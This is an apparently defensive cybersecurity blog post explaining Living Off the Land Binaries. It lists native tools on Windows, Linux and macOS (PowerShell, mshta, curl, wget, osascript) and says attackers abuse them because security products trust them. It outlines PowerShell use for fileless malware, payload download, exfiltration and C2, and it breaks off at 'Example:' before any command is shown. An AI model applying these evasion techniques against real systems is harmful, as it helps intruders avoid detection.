Blog

  • Living Off the Land Binaries (LOLBins)

    In the evolving landscape of cybersecurity, attackers are constantly refining their techniques to evade detection. One of the more insidious methods in recent years is the exploitation of Living Off the Land Binaries (LOLBins). These are legitimate binaries or scripts included in operating systems or trusted third-party software that attackers abuse to carry out malicious activities. This article explores what LOLBins are, how they are exploited, and how organizations can defend against these sophisticated attacks.

    What Are LOLBins?

    The term “LOLBins” refers to binaries or scripts that are native to an operating system or part of trusted software packages. These tools are designed for legitimate administrative or operational purposes, such as file management, scripting, or diagnostics. Examples include:

    • Windows: powershell.exe, wscript.exe, cmd.exe, mshta.exe
    • Linux: bash, curl, wget, gcc
    • macOS: osascript, launchctl

    The key feature of LOLBins is that they are pre-installed and signed by the operating system vendor. Because of their legitimacy, they are less likely to trigger alerts in endpoint detection and response (EDR) systems or antivirus software.

    Why Attackers Use LOLBins

    Attackers favor LOLBins for several reasons:

    1. Trust and Legitimacy
      LOLBins are trusted by the operating system and security software. This reduces the likelihood of detection, as they blend into the regular operational noise of a system.
    2. No Need for Additional Payloads
      Using LOLBins minimizes the need for attackers to introduce foreign binaries into a system, which could be flagged by security solutions.
    3. Bypassing Security Controls
      Many security solutions whitelist system binaries, assuming they are non-malicious. Attackers exploit this assumption to bypass application whitelisting and other restrictive policies.
    4. Cross-Platform Compatibility
      Many LOLBins, such as scripting engines (Python, PowerShell), are available across multiple operating systems, providing attackers with a consistent toolset.

    Common LOLBins and Their Abuse Techniques

    Below are some examples of popular LOLBins and how attackers exploit them:

    Windows LOLBins

    1. powershell.exe
      PowerShell is a powerful scripting language and shell environment on Windows. It is frequently used in administrative tasks but is also a favorite among attackers due to its extensive capabilities.Exploitation:
      • Fileless malware: Attackers use PowerShell scripts loaded directly into memory to avoid writing malicious files to disk.
      • Command-and-control (C2): Attackers use PowerShell for downloading payloads, exfiltrating data, or establishing a persistent C2 connection.
      Example: